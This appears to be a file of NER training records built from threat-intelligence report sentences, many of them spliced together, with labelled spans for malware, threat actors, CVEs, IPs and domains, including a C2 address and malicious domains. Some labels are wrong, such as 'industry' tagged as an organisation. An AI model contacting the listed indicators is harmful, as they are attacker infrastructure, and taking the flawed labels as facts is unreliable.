{"text": "To perform some of its activities , the malware does not need high privileges inside the device , as we will explain ahead . PwC UK and BAE Systems , working closely with industry and government , have uncovered a new , unparallelled campaign which we refer to as Operation Cloud Hopper . We have contacted ASUS and informed them about the attack on Jan 31 , 2019 , supporting their investigation with IOCs and descriptions of the malware . • None consisting of CVE-2022 - 41080 and CVE-2022 - 41082 to achieve remote code execution ( RCE ) through Outlook Web Access ( OWA ) .", "spans": {"ORGANIZATION: PwC UK": [[125, 131]], "ORGANIZATION: BAE Systems": [[136, 147]], "ORGANIZATION: industry": [[171, 179]], "ORGANIZATION: government": [[184, 194]], "ORGANIZATION: ASUS": [[307, 311]], "VULNERABILITY: CVE-2022 - 41080": [[462, 478]], "VULNERABILITY: CVE-2022 - 41082": [[483, 499]], "TOOL: Outlook Web Access ( OWA )": [[549, 575]]}, "info": {"id": "cyberner_stix_train_003207", "source": "cyberner_stix_train"}}
{"text": "PsExec is a Microsoft Sysinternals tool for executing processes on other systems and is one of the most frequently seen legitimate pieces of software used by attackers attempting to live off the land . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros .", "spans": {"TOOL: PsExec": [[0, 6]], "VULNERABILITY: CVE-2012-0158": [[266, 279]], "VULNERABILITY: CVE-2013-3906": [[282, 295]], "VULNERABILITY: CVE-2014-1761": [[299, 312]]}, "info": {"id": "cyberner_stix_train_003208", "source": "cyberner_stix_train"}}
{"text": "Copy the contents from the client response object into the translated server object .", "spans": {}, "info": {"id": "cyberner_stix_train_003209", "source": "cyberner_stix_train"}}
{"text": "The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party . Icefog , also known as the \" Dagger Panda \" by Crowdstrike 's naming convention , infected targets mainly in South Korea and Japan . For example , we observed an APT attacker pasting the string “ czo1NA== ” into an HTML page . When an attacker pays for an as - a - service malware , they often get an individual login with dedicated customer support , much like any user would with a legitimate piece of software .", "spans": {"ORGANIZATION: Fatah": [[133, 138]], "THREAT_ACTOR: Icefog": [[157, 163]], "THREAT_ACTOR: Dagger Panda": [[186, 198]], "ORGANIZATION: Crowdstrike": [[204, 215]], "TOOL: HTML": [[372, 376]], "THREAT_ACTOR: attacker": [[392, 400]], "MALWARE: as - a - service malware": [[413, 437]]}, "info": {"id": "cyberner_stix_train_003210", "source": "cyberner_stix_train"}}
{"text": "Some of the targeted apps were : Whatsapp YouTube Video Downloader Google Update Instagram Hack Wifi AirDroid WifiHacker Facebook Photoshop SkyTV Hotstar Trump Dash PokemonGo With many more to come . Group-IB specialists determined that the email addresses of IT bank employees were among the recipients of these emails . If successful , Cobalt goes on to attack financial institutions outside the country .", "spans": {"SYSTEM: Whatsapp": [[33, 41]], "SYSTEM: YouTube Video Downloader": [[42, 66]], "SYSTEM: Google Update": [[67, 80]], "SYSTEM: Instagram": [[81, 90]], "SYSTEM: Hack Wifi": [[91, 100]], "SYSTEM: AirDroid": [[101, 109]], "SYSTEM: WifiHacker": [[110, 120]], "SYSTEM: Facebook": [[121, 129]], "SYSTEM: Photoshop": [[130, 139]], "SYSTEM: SkyTV": [[140, 145]], "SYSTEM: Hotstar": [[146, 153]], "SYSTEM: Trump Dash": [[154, 164]], "SYSTEM: PokemonGo": [[165, 174]], "ORGANIZATION: Group-IB": [[200, 208]], "ORGANIZATION: bank": [[263, 267]], "ORGANIZATION: employees": [[268, 277]], "THREAT_ACTOR: Cobalt": [[338, 344]], "ORGANIZATION: financial institutions": [[363, 385]]}, "info": {"id": "cyberner_stix_train_003211", "source": "cyberner_stix_train"}}
{"text": "Kegotip is an infostealer ( credentials and email addresses ) used to facilitate other crimeware activities .", "spans": {"MALWARE: Kegotip": [[0, 7]], "TOOL: infostealer": [[14, 25]], "TOOL: email": [[44, 49]]}, "info": {"id": "cyberner_stix_train_003212", "source": "cyberner_stix_train"}}
{"text": "During investigation of the Command & Control server ( with IP 176.31.112.10 hardcoded in Artifact #2 ) , we managed to identify some operational mistakes made by the attackers , allowing us to connect the incident with attacks previously associated with the Sofacy Group .", "spans": {"TOOL: Command & Control": [[28, 45]], "IP_ADDRESS: 176.31.112.10": [[63, 76]], "THREAT_ACTOR: Sofacy": [[259, 265]]}, "info": {"id": "cyberner_stix_train_003213", "source": "cyberner_stix_train"}}
{"text": "Android ’ s accessibility services were originally developed by Google for the benefit of users with disabilities . The threat actors , observed by FireEye Labs , use a variety of different methods to either compromise or acquire already compromised payment card credentials , including sharing or purchasing dumps online , hacking vulnerable merchant websites and compromising payment card processing devices . On August 23 , 2017 , we observed OilRig targeting an organization within the United Arab Emirates government .", "spans": {"SYSTEM: Android": [[0, 7]], "ORGANIZATION: Google": [[64, 70]], "THREAT_ACTOR: actors": [[127, 133]], "ORGANIZATION: FireEye Labs": [[148, 160]], "THREAT_ACTOR: OilRig": [[446, 452]], "ORGANIZATION: government": [[511, 521]]}, "info": {"id": "cyberner_stix_train_003214", "source": "cyberner_stix_train"}}
{"text": "This newly observed activity uses a series of redirections and fileless , malicious implementations of legitimate tools to gain access to the targeted systems . In 2015 , the SecureWorks® Counter Threat Unit™ ( CTU ) research team documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU™ analysis suggests is based in the People's Republic of China ( PRC ) .", "spans": {"ORGANIZATION: SecureWorks® Counter Threat Unit™": [[175, 208]], "ORGANIZATION: CTU": [[211, 214]], "THREAT_ACTOR: TG-3390": [[291, 298]], "ORGANIZATION: CTU™": [[309, 313]], "ORGANIZATION: People's Republic of China": [[348, 374]], "ORGANIZATION: PRC": [[377, 380]]}, "info": {"id": "cyberner_stix_train_003215", "source": "cyberner_stix_train"}}
{"text": "They target groups across Middle East and Central Asia , primarily using spear phishing emails with malicious attachments .", "spans": {"TOOL: emails": [[88, 94]]}, "info": {"id": "cyberner_stix_train_003216", "source": "cyberner_stix_train"}}
{"text": "The record contains a personal email address : WHOIS records of C2 server exposing the attacker ’ s email address We were aware of the possibility that the attackers might be using a compromised email account , so we dug deeper to find more information related to this email address . From at least February 2019 to present , the actors in the LUCKY ELEPHANT campaign copied webpages to mimic South Asian government websites as well as Microsoft Outlook 365 login pages and hosted them on their own doppelganger domains , presumably to trick victims into providing login credentials . GreezaBackdoor of DarkHotel : 5e0e11bca0e94914e565c1dcc1ee6860 .", "spans": {"THREAT_ACTOR: LUCKY ELEPHANT": [[344, 358]], "ORGANIZATION: South Asian government websites": [[393, 424]], "ORGANIZATION: Microsoft Outlook": [[436, 453]], "MALWARE: GreezaBackdoor": [[585, 599]], "THREAT_ACTOR: DarkHotel": [[603, 612]], "FILEPATH: 5e0e11bca0e94914e565c1dcc1ee6860": [[615, 647]]}, "info": {"id": "cyberner_stix_train_003217", "source": "cyberner_stix_train"}}
{"text": "Network activity BrainTest communicates with five servers : APK files provider ( http : //psserviceonline [ . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . Following the trail of existing public reporting , the tie to FIN7 is essentially made based on a download observed from a MuddyWater C2 , of a non-public tool \" DNSMessenger \" .", "spans": {"THREAT_ACTOR: group": [[140, 145]], "THREAT_ACTOR: hackers": [[164, 171]], "VULNERABILITY: zero-day exploit": [[215, 231]], "THREAT_ACTOR: Gamma Group": [[357, 368]], "THREAT_ACTOR: FIN7": [[433, 437]], "MALWARE: MuddyWater C2": [[494, 507]], "MALWARE: non-public tool": [[515, 530]], "MALWARE: DNSMessenger": [[533, 545]]}, "info": {"id": "cyberner_stix_train_003218", "source": "cyberner_stix_train"}}
{"text": "Methods and techniques 2013 not only saw a radical increase in output from mobile virus writers but also saw them actively applying methods and technologies that allowed cybercriminals to use their malware more effectively . The campaign is believed to be active covertly since fall 2017 . These protests gathered hundreds of thousands of people in the streets with large support from students of Hong Kong universities , leading to multiple university campus occupations by the protesters . PIEHOP utilizes LIGHTWORK to execute the IEC-104 commands \" ON ” or \" OFF \" on the remote system and immediately deletes the executable after issuing the commands .", "spans": {"TOOL: PIEHOP": [[492, 498]], "TOOL: LIGHTWORK": [[508, 517]]}, "info": {"id": "cyberner_stix_train_003219", "source": "cyberner_stix_train"}}
{"text": "Hamas , who has historically maintained control over the strip , elected Yahya al-Sinwar – a hardliner from its military wing – as its leader in February .", "spans": {"ORGANIZATION: Hamas": [[0, 5]]}, "info": {"id": "cyberner_stix_train_003220", "source": "cyberner_stix_train"}}
{"text": "Eastern countries . This week we will discuss another Chinese nexus adversary we call Samurai Panda . The second file follows a decodable binary format . As previously recommended , updating Windows , Java and Adobe Reader to the latest versions should provide a basic level of defense against the known Miniduke attacks .", "spans": {"ORGANIZATION: Java": [[201, 205]], "TOOL: Adobe Reader": [[210, 222]], "THREAT_ACTOR: the known Miniduke attacks": [[294, 320]]}, "info": {"id": "cyberner_stix_train_003221", "source": "cyberner_stix_train"}}
{"text": "The client was likely built using the Quasar server client builder .", "spans": {"MALWARE: Quasar": [[38, 44]]}, "info": {"id": "cyberner_stix_train_003222", "source": "cyberner_stix_train"}}
{"text": "This was also reinforced by their naming conventions , wherein different versions are simply named after the code iterations , following a specific format regardless of the actual function of the code .", "spans": {}, "info": {"id": "cyberner_stix_train_003223", "source": "cyberner_stix_train"}}
{"text": "Additionally , some copies of Exodus One use the following XOR key : Rino Gattuso is a famous retired Italian footballer , originally from Calabria . TA459 is well-known for targeting organizations in Russia and neighboring countries . Downloads a Base64 encoded payload from the following URL : Apropos of my retrospective report , Bullock found that a great many messages in Biderman ’s inbox were belligerent and anti - Semitic screeds from a former Ashley Madison employee named William Brewster Harrison .", "spans": {"THREAT_ACTOR: TA459": [[150, 155]], "ORGANIZATION: Bullock": [[333, 340]], "ORGANIZATION: Ashley Madison employee": [[453, 476]], "ORGANIZATION: William Brewster Harrison": [[483, 508]]}, "info": {"id": "cyberner_stix_train_003224", "source": "cyberner_stix_train"}}
{"text": "As we know from our investigation , traces of the first development activities were found at the end of 2016 , but the main distribution campaign began in 2018 ( end of 2017 ) . With the experience gained from the APT attack that began in March 2017 , it seems this campaign has evolved into an attack with new capabilities , and an even more specific target , over a year later . This malware uses Windows Bluetooth APIs to find information on connected Bluetooth devices and saves the following information .", "spans": {"SYSTEM: Windows": [[399, 406]], "TOOL: Bluetooth": [[407, 416], [455, 464]]}, "info": {"id": "cyberner_stix_train_003225", "source": "cyberner_stix_train"}}
{"text": "] com and ora.studiolegalebasili [ . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . Poison Ivy is a remote access tool that is freely available for download from its official web site at www.poisonivy-rat.com .", "spans": {"MALWARE: China Chopper": [[37, 50]], "THREAT_ACTOR: attackers": [[73, 82]], "MALWARE: Poison Ivy": [[211, 221]], "DOMAIN: www.poisonivy-rat.com": [[314, 335]]}, "info": {"id": "cyberner_stix_train_003226", "source": "cyberner_stix_train"}}
{"text": "In April , at the time of writing this post , we recorded 413 RuMMS infections . The samples of ThreeDollars we collected in these attacks are structurally very similar to the first sample we analyzed in October 2017 , down to the lure image used to trick the recipient into clicking the \" Enable Content \" button to execute the malicious macro . The base64 data and image are separated by the \" **** \" string . School budgets are tight and institutions are understandably keen to direct their budgets at things that directly benefit pupils .", "spans": {"MALWARE: RuMMS": [[62, 67]], "TOOL: ThreeDollars": [[96, 108]], "ORGANIZATION: institutions": [[441, 453]]}, "info": {"id": "cyberner_stix_train_003227", "source": "cyberner_stix_train"}}
{"text": "For now , we observe only one payload version for following the ARM CPUs : arm64-v8a , armeabi , armeabi-v7a . The link to the final payload of KerrDown was still active during the time of analysis and hence we were able to download a copy which turned out to be a variant of Cobalt Strike Beacon . Magic Hound : Rocket Kitten , Operation Saffron Rose , Ajax Security Team , Operation Woolen-Goldfish , Newscaster , Cobalt Gypsy , APT35 .", "spans": {"SYSTEM: ARM": [[64, 67]], "SYSTEM: arm64-v8a": [[75, 84]], "SYSTEM: armeabi": [[87, 94]], "SYSTEM: armeabi-v7a": [[97, 108]], "MALWARE: KerrDown": [[144, 152]], "ORGANIZATION: we": [[208, 210]], "THREAT_ACTOR: Magic Hound": [[299, 310]], "THREAT_ACTOR: Rocket Kitten": [[313, 326]], "THREAT_ACTOR: Operation Saffron Rose": [[329, 351]], "THREAT_ACTOR: Ajax Security Team": [[354, 372]], "THREAT_ACTOR: Operation Woolen-Goldfish": [[375, 400]], "THREAT_ACTOR: Newscaster": [[403, 413]], "THREAT_ACTOR: Cobalt Gypsy": [[416, 428]], "THREAT_ACTOR: APT35": [[431, 436]]}, "info": {"id": "cyberner_stix_train_003228", "source": "cyberner_stix_train"}}
{"text": "Using XREFs during static analysis is a common technique to quickly find where functions of interest are called . However , it is still widely used , notably in Russia .", "spans": {"TOOL: XREFs": [[6, 11]]}, "info": {"id": "cyberner_stix_train_003229", "source": "cyberner_stix_train"}}
{"text": "Researchers from Bitdefender also released an analysis of one of the samples in a blogpost . Throughout 2017 and 2018 , Fxmsp established a network of trusted proxy resellers to promote their breaches on the criminal underground . One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges . Stolen credentials can be resold to other threat actors tied to ransomware gangs .", "spans": {"THREAT_ACTOR: Fxmsp": [[120, 125]], "SYSTEM: Windows": [[301, 308]], "TOOL: UAC": [[309, 312]], "TOOL: User Account Control": [[315, 335]], "ORGANIZATION: Bitdefender": [[17, 28]]}, "info": {"id": "cyberner_stix_train_003230", "source": "cyberner_stix_train"}}
{"text": "The malware was distributed from infected devices via SMS in the form “ % USERNAME % , I ’ ll buy under a secure transaction . The DeepSight Managed Adversary and Threat Intelligence (MATI) team co-authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug (aka Turla) cyber espionage group , and methods of detecting and thwarting activities of this adversary . The malware has evolved over time .", "spans": {"ORGANIZATION: DeepSight Managed Adversary": [[131, 158]], "ORGANIZATION: Threat Intelligence": [[163, 182]], "THREAT_ACTOR: Waterbug": [[337, 345]], "ORGANIZATION: group": [[374, 379]]}, "info": {"id": "cyberner_stix_train_003231", "source": "cyberner_stix_train"}}
{"text": "We chose the name “ HenBox ” based on metadata found in most of the malicious apps such as package names and signer detail . This technique was also observed against a government organizations in the Middle East and North African region . The group targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy .", "spans": {"MALWARE: HenBox": [[20, 26]], "ORGANIZATION: media": [[269, 274]], "THREAT_ACTOR: admin@338": [[293, 302]], "MALWARE: remote access Trojans": [[360, 381]], "MALWARE: Poison Ivy": [[390, 400]], "ORGANIZATION: government": [[411, 421]], "ORGANIZATION: financial firms": [[426, 441]], "ORGANIZATION: global economic": [[458, 473]]}, "info": {"id": "cyberner_stix_train_003232", "source": "cyberner_stix_train"}}
{"text": "These tools include:AIRBREAK: a JavaScript-based backdoor also reported as Orz that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.BADFLICK: a backdoor that is capable of modifying the file system , generating a reverse shell , and modifying its command and control (C2) configuration . RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism .", "spans": {"TOOL: JavaScript-based backdoor": [[32, 57]], "MALWARE: RIPPER": [[356, 362]]}, "info": {"id": "cyberner_stix_train_003233", "source": "cyberner_stix_train"}}
{"text": ") to C & C ( calllog.php ) Whenever the user snaps a picture , either with the front or rear camera , it gets sent to the C & C ( uppc.php , fi npic.php orreqpic.php ) Can send GPS coordinates to C & C ( gps3.php ) The C & C server to which the application seems to be sending collected data appears to be operational , as of this writing , and running since May 2018 . Silence started by targeting organizations in Russia , gradually shifting their focus to former Soviet countries , and then the world . While FIN7 has embedded VBE as OLE objects for over a year , they continue to update their script launching mechanisms .", "spans": {"SYSTEM: GPS": [[177, 180]], "THREAT_ACTOR: Silence": [[370, 377]], "THREAT_ACTOR: FIN7": [[512, 516]], "MALWARE: VBE": [[530, 533]]}, "info": {"id": "cyberner_stix_train_003234", "source": "cyberner_stix_train"}}
{"text": "While the malware is capable of facilitating various cyber-criminal goals , our team confirmed it ’ s currently installing additional apps on infected devices . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . This section details changes made to APT10 tools , techniques and procedures ( TTPs ) post-2014 , following its shift from Poison Ivy to PlugX .", "spans": {"ORGANIZATION: security firm": [[178, 191]], "ORGANIZATION: military officials": [[224, 242]], "VULNERABILITY: Adobe Reader vulnerability": [[314, 340]], "THREAT_ACTOR: APT10": [[380, 385]], "MALWARE: Poison Ivy": [[466, 476]], "MALWARE: PlugX": [[480, 485]]}, "info": {"id": "cyberner_stix_train_003235", "source": "cyberner_stix_train"}}
{"text": "Accordingly , the server side certificates appear to be generated locally on VPS hosts that exclusively are paid for at providers with bitcoin merchant processing .", "spans": {"TOOL: VPS": [[77, 80]]}, "info": {"id": "cyberner_stix_train_003236", "source": "cyberner_stix_train"}}
{"text": "The HenBox app downloaded in May 2016 was masquerading as the DroidVPN app . The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan . Given the mission , resourcing , and location of PLA Unit 61398 , we conclude that PLA Unit 61398 is APT1 .", "spans": {"MALWARE: HenBox": [[4, 10]], "MALWARE: .NET module": [[93, 104]], "MALWARE: KopiLuwak JavaScript": [[129, 149]], "THREAT_ACTOR: PLA Unit 61398": [[208, 222], [242, 256]], "THREAT_ACTOR: APT1": [[260, 264]]}, "info": {"id": "cyberner_stix_train_003237", "source": "cyberner_stix_train"}}
{"text": "The C & C role for Rotexy can be filled not only by a web server but also by any device that can send SMSs . In a separate incident , CTU researchers identified a file named s.txt , which is consistent with the output of the Netview host-enumeration tool . Symantec identified two strains of custom malware used by the Leafminer group : Trojan.Imecab and Backdoor.Sorgu .", "spans": {"MALWARE: Rotexy": [[19, 25]], "ORGANIZATION: CTU": [[134, 137]], "MALWARE: s.txt": [[174, 179]], "ORGANIZATION: Symantec": [[257, 265]], "THREAT_ACTOR: Leafminer group": [[319, 334]], "MALWARE: Trojan.Imecab": [[337, 350]], "MALWARE: Backdoor.Sorgu": [[355, 369]]}, "info": {"id": "cyberner_stix_train_003238", "source": "cyberner_stix_train"}}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations .", "spans": {"MALWARE: documents": [[12, 21]], "VULNERABILITY: CVE-2017-0199": [[32, 45]], "MALWARE: WhiteBear": [[90, 99]], "ORGANIZATION: embassies": [[124, 133]]}, "info": {"id": "cyberner_stix_train_003239", "source": "cyberner_stix_train"}}
{"text": "This time I'm going to focus on malicious CHM files used by Silence APT . It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data Exfiltration from high-profile victim organizations .", "spans": {"TOOL: CHM files": [[42, 51]], "THREAT_ACTOR: Silence APT": [[60, 71]], "THREAT_ACTOR: attackers": [[130, 139]], "MALWARE: Naikon proxies": [[147, 161]]}, "info": {"id": "cyberner_stix_train_003240", "source": "cyberner_stix_train"}}
{"text": "If an unsuspecting user grants these permissions ( see Figure 4 ) , the trojan can read any text displayed in any app the user may launch – and send it to the attackers . On June 14 , we saw TA505’s campaign still targeting UAE with similar tactics and techniques , but this time , some of the spam emails were delivered via the Amadey botnet . The Lazarus Group employs a variety of RATs and staging malware to conduct cyber operations , many of which contain significant code overlap that points to at least a shared development environment .", "spans": {"THREAT_ACTOR: TA505’s": [[191, 198]], "TOOL: Amadey botnet": [[329, 342]], "THREAT_ACTOR: Lazarus Group": [[349, 362]], "MALWARE: RATs": [[384, 388]], "MALWARE: staging": [[393, 400]], "MALWARE: malware": [[401, 408]]}, "info": {"id": "cyberner_stix_train_003241", "source": "cyberner_stix_train"}}
{"text": "In a three-month period from August to October 2018 , it launched over 70,000 attacks against users located primarily in Russia . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia . Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library ( .dll )", "spans": {"THREAT_ACTOR: APT32": [[140, 145]], "MALWARE: Vietnam.exe": [[244, 255]], "ORGANIZATION: diaspora": [[315, 323]], "MALWARE: Volgmer": [[344, 351]], "TOOL: dynamic-link library": [[420, 440]], "FILEPATH: .dll": [[443, 447]]}, "info": {"id": "cyberner_stix_train_003242", "source": "cyberner_stix_train"}}
{"text": "As seen in previous Downeks versions , it uses masquerades with icons , filenames and metadata imitating popular legitimate applications such as VMware workstation and CCleaner , or common file formats such as DOC and PDF .", "spans": {"MALWARE: Downeks": [[20, 27]], "TOOL: masquerades with icons": [[47, 69]], "TOOL: filenames": [[72, 81]], "TOOL: metadata imitating popular legitimate applications": [[86, 136]], "TOOL: VMware workstation": [[145, 163]], "TOOL: CCleaner": [[168, 176]], "TOOL: DOC": [[210, 213]], "TOOL: PDF": [[218, 221]]}, "info": {"id": "cyberner_stix_train_003243", "source": "cyberner_stix_train"}}
{"text": "PLATINUM has used several zero-day exploits against their victims . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "VULNERABILITY: zero-day exploits": [[26, 43]], "ORGANIZATION: Kaspersky Lab": [[68, 81]], "ORGANIZATION: Microsoft Office": [[105, 121]], "VULNERABILITY: exploits": [[122, 130]], "FILEPATH: Exploit.MSWord.CVE-2010-333": [[178, 205]], "FILEPATH: Exploit.Win32.CVE-2012-0158": [[208, 235]]}, "info": {"id": "cyberner_stix_train_003244", "source": "cyberner_stix_train"}}
{"text": "This is also the first version where the package name changes into something that a less aware user may be tricked by , com.android.playup . Their primary interest appears to be gathering intelligence . FireEye dubbed this new malware family HIGHTIDE . RTM used Port 44443 for its VNC module .", "spans": {"ORGANIZATION: FireEye": [[203, 210]], "MALWARE: HIGHTIDE": [[242, 250]], "THREAT_ACTOR: RTM": [[253, 256]], "SYSTEM: VNC module": [[281, 291]]}, "info": {"id": "cyberner_stix_train_003245", "source": "cyberner_stix_train"}}
{"text": "The PowerShell script will look at the architecture of the system to check which malicious DLL files should be downloaded . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 .", "spans": {"TOOL: PowerShell script": [[4, 21]], "MALWARE: malicious DLL files": [[81, 100]], "TOOL: emails": [[176, 182]], "FILEPATH: Microsoft Word documents": [[188, 212]], "VULNERABILITY: CVE-2017-0199": [[224, 237]]}, "info": {"id": "cyberner_stix_train_003246", "source": "cyberner_stix_train"}}
{"text": "Android shell A new package was added that allows the execution of commands in the Android shell . The malicious attachments purported to be invitations or drafts of the agenda for the conference . Jason_invitation.doc : 00a95fb30be2d6271c491545f6c6a707 , CVE-2012-0158 . Monitor network data flows for unexpected patterns and metadata that may be indicative of a mismatch between protocol and utilized port .", "spans": {"SYSTEM: Android": [[0, 7], [83, 90]], "MALWARE: malicious attachments": [[103, 124]], "TOOL: invitations": [[141, 152]], "TOOL: drafts of the agenda": [[156, 176]], "FILEPATH: Jason_invitation.doc": [[198, 218]], "FILEPATH: 00a95fb30be2d6271c491545f6c6a707": [[221, 253]], "VULNERABILITY: CVE-2012-0158": [[256, 269]]}, "info": {"id": "cyberner_stix_train_003247", "source": "cyberner_stix_train"}}
{"text": ") “ % USERNAME % , je vous ai envoyé un prepaiement m-leboncoin [ . Kaspersky reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013 . The malware includes 2 domains: phpschboy.prohosts.org , jams481.site.bz .", "spans": {"ORGANIZATION: Kaspersky": [[68, 77]], "THREAT_ACTOR: APT33": [[91, 96]], "THREAT_ACTOR: group": [[110, 115]], "DOMAIN: phpschboy.prohosts.org": [[218, 240]], "DOMAIN: jams481.site.bz": [[243, 258]]}, "info": {"id": "cyberner_stix_train_003248", "source": "cyberner_stix_train"}}
{"text": "Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . It's coincident that both 'darkhydrus' APT group name and ‘Williams’ user name in PDB path found in this Twitter user .", "spans": {"VULNERABILITY: CVE-2017-1099": [[71, 84]], "MALWARE: RTF attachments": [[100, 115]], "THREAT_ACTOR: 'darkhydrus'": [[153, 165]], "THREAT_ACTOR: ‘Williams’": [[185, 195]], "ORGANIZATION: Twitter user": [[232, 244]]}, "info": {"id": "cyberner_stix_train_003249", "source": "cyberner_stix_train"}}
{"text": "With the account credentials , the attackers were able to access the victim 's account and navigate the internal corporate network as though they were the employee .", "spans": {}, "info": {"id": "cyberner_stix_train_003250", "source": "cyberner_stix_train"}}
{"text": "We were able to determine this because the attackers ’ hacktools are command line driven and can provide insight into when the operators are behind keyboards actively working .", "spans": {}, "info": {"id": "cyberner_stix_train_003251", "source": "cyberner_stix_train"}}
{"text": "To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys . We believe that Bookworm samples use the static date string as campaign codes , which we used to determine the approximate date of each attack that we did not have detailed targeting information .", "spans": {"MALWARE: c:\\temp\\rr.exe": [[54, 68]], "MALWARE: Bookworm samples": [[175, 191]]}, "info": {"id": "cyberner_stix_train_003252", "source": "cyberner_stix_train"}}
{"text": "This makes Dvmap the first Android malware that injects malicious code into the system libraries in runtime , and it has been downloaded from the Google Play Store more than 50,000 times . After the infection stage , criminals move laterally with the help of legitimate and pentesting tools , stealing passwords from their initial victims ( entry point ) to gain access to the computers within the organization that have access to money transactions . Recently we noticed that these modules had been merged into a single backdoor module able to collect data from clipboard and capture screenshots . Shortly thereafter , ESET ® researchers analyzed a sophisticated new malware , which is the main suspect in this case .", "spans": {"MALWARE: Dvmap": [[11, 16]], "SYSTEM: Android": [[27, 34]], "SYSTEM: Google Play Store": [[146, 163]], "ORGANIZATION: ESET ® researchers": [[620, 638]], "MALWARE: new malware": [[664, 675]]}, "info": {"id": "cyberner_stix_train_003253", "source": "cyberner_stix_train"}}
{"text": "The Lazarus group is currently one of the most active and prolific APT actors .", "spans": {"THREAT_ACTOR: Lazarus": [[4, 11]]}, "info": {"id": "cyberner_stix_train_003254", "source": "cyberner_stix_train"}}
{"text": "Despite its known weaknesses , the RC4 algorithm is regularly used by malware authors . While discussions of threats in this region often focus on \" North America \" generally or just the United States , nearly 100 campaigns during this period were either specifically targeted at Canadian organizations or were customized for Canadian audiences .", "spans": {"TOOL: RC4": [[35, 38]], "ORGANIZATION: audiences": [[335, 344]]}, "info": {"id": "cyberner_stix_train_003255", "source": "cyberner_stix_train"}}
{"text": "smishing ) . The targeting of mainly Saudi Arabian organizations across a wide variety of industries aligns with historical targeting patterns for the group , which appear undeterred following previous exposés of their activity . Kaspersky Lab is releasing crucial Indicators of Compromise ( IOCs ) and other data to help organizations search for traces of these attack groups in their corporate networks .", "spans": {"THREAT_ACTOR: group": [[151, 156]], "ORGANIZATION: Kaspersky Lab": [[230, 243]], "THREAT_ACTOR: attack groups": [[363, 376]]}, "info": {"id": "cyberner_stix_train_003256", "source": "cyberner_stix_train"}}
{"text": "The next stage in device infection could be the use of exploit kits and malvertising , which would be quite effective due the many Android vulnerabilities and consumers with unpatched devices . Attackers are targeting Windows platform and aiming at government institutions as well as big companies in Colombia . Group 72 ’s involvement in Operation SMN is another example of what sort of damage that can be done if organizations are not diligent in their efforts to secure their networks . As an example , we took the twitter login page , which implemented the following CSP rule ( which contains ): The following short JS code inserted into the site will send the credentials to google - analytics console controlled by us : The UA-#######- # parameter is the tag ID owner that Google Analytics uses to connect the data to a specific account .", "spans": {"VULNERABILITY: Android vulnerabilities": [[131, 154]], "VULNERABILITY: unpatched devices": [[174, 191]], "ORGANIZATION: government institutions": [[249, 272]], "THREAT_ACTOR: Group 72": [[312, 320]], "SYSTEM: twitter": [[518, 525]], "ORGANIZATION: CSP": [[571, 574]]}, "info": {"id": "cyberner_stix_train_003257", "source": "cyberner_stix_train"}}
{"text": "The result of this entire command saves a variant of the Awen asp.net webshell ( T1100 ) to the SharePoint server to further interact with the compromise server .", "spans": {"TOOL: Awen": [[57, 61]], "FILEPATH: asp.net": [[62, 69]], "TOOL: SharePoint": [[96, 106]]}, "info": {"id": "cyberner_stix_train_003258", "source": "cyberner_stix_train"}}
{"text": "via Authorized App Store Impersonates security app on Google Play . Curiously though , Waterbug also compromised other computers on the victim’s network using its own infrastructure . The Lazarus used a similar infrastructure to earlier threats , including the Destover backdoor variant known as Escad .", "spans": {"SYSTEM: App Store": [[15, 24]], "SYSTEM: Google Play": [[54, 65]], "THREAT_ACTOR: Waterbug": [[87, 95]], "ORGANIZATION: infrastructure": [[167, 181]], "THREAT_ACTOR: Lazarus": [[188, 195]], "MALWARE: Destover backdoor": [[261, 278]], "MALWARE: Escad": [[296, 301]]}, "info": {"id": "cyberner_stix_train_003259", "source": "cyberner_stix_train"}}
